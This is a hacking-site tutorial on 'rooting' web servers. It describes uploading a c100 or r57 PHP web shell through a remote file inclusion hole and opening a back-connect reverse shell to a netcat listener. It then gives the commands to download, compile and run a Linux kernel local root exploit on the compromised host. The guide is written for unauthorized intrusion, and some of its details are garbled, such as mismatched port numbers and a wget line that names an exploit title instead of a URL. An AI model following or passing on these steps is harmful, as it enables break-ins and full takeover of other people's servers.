ROOTING (FULL TUTORIAL) BY MaX-HaCk3r - Server Rooting - Web Hacking - Hacking - GeniusHackers.Net
Main » Articles » Web Hacking » Server Rooting

ROOTING (FULL TUTORIAL) BY MaX-HaCk3r

Rooting Full Tutorial BY MaX-HaCk3r
This is Tutorial Which is not discussed
What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains and luck.


First of all, we need to get a shell on a site.
For this tutorial i will be using c100 or r57 Shell.

So, once you have it on a site, go to the ‘Backdoor Host’ tab and forward a port.

Now, go to the ‘Back Connect’ tab and insert the following settings:

1- Your IP Address.

2-The port you forwarded.

Now, go on CMD and type in:cd ‘Path To Your Netcat.exe’ and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]

© Copyright 1985-2001 Microsoft Corp.

C:\FeAR>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444

listening on [any] 8080 …

Now, when you have netcat listening to the port you forwarded, click ‘Connect’.

When your connected, type ‘whoami’.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type ‘uname -a’.

It should look something like this:

Code:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686

Now, we go on exploit-db.com and we will look for ’2.6.17′.

Code:

Now, we type ‘wget Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit on the netcat window.

Code:

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type ‘gcc 5092 -o exploit’.

Code:

gcc 5092 -o exploit

5092- After the url path.http://www.site.com/5092.

exploit- Output name.

Now you can execute your exploit by typing ‘./exploit’

Wait for the exploit to finish running and type root again.

It should output in something like this:

Code:

uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box .

There are more ways to do this, this is the way I usually do it. 

there are public exploits for some servers like 2009 and 2010 but 2011 or some 2010 servers are private exploit.i will be telling how to hack those using symlink in the next tutorial.

Category: Server Rooting | Added by: max_hacker (12.07.30)
Views: 718 | Rating: 4.0/1
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Like us on FacebookFollow us on Twitter
Recommend on Google
Our Media
Our Media

Our Blog
Our Blog

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2016
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz